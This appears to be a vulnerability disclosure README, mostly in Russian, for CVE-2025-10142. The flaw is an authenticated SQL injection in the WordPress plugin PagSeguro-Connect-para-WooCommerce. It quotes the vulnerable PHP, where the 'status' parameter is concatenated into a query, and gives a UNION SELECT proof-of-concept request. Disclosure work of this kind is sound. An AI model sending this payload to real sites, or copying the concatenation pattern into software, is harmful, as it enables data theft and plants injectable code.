
Disclosure for CVE-2025-10142
Раскрытие информации о CVE-2025-10142
Этот репозиторий раскрывает уязвимость, обнаруженную в PagSeguro-Connect-para-WooCommerce <= 4.44.3, плагине WordPress, разработанном Ricardo Martins.
| CVE ID | Тип | Компонент | Воздействие |
|---|---|---|---|
| CVE-2025-10142 | SQL-инъекция аутентифицированного (Shop Manager+) | src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.php | Аутентифицированный злоумышленник может извлечь данные |
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -
Параметр status напрямую конкатенируется в SQL-запрос без экранирования или использования $wpdb->prepare()
if (!empty($_REQUEST['status'])) {
$status = sanitize_text_field(wp_unslash($_REQUEST['status']));
$where .= " AND status = '$status'";
}
$this->items = $wpdb->get_results(
$wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY $orderby $order LIMIT %d OFFSET %d",
$per_page,
($current_page - 1) * $per_page
),
ARRAY_A
);
...
Поскольку атака возможна от ShopManager, угроза довольно низкая. Было немного сложно проследить обработку, при которой внешний ввод помещается в $where, а затем этот $where напрямую используется в SQL-синтаксисе.
Имя: MooseLove
Роль: Независимый исследователь безопасности / баг-хантер
Контакты: Предоставляются по запросу
Данное уведомление предоставляется для повышения осведомленности о безопасности. Разрешено свободное распространение с указанием авторства.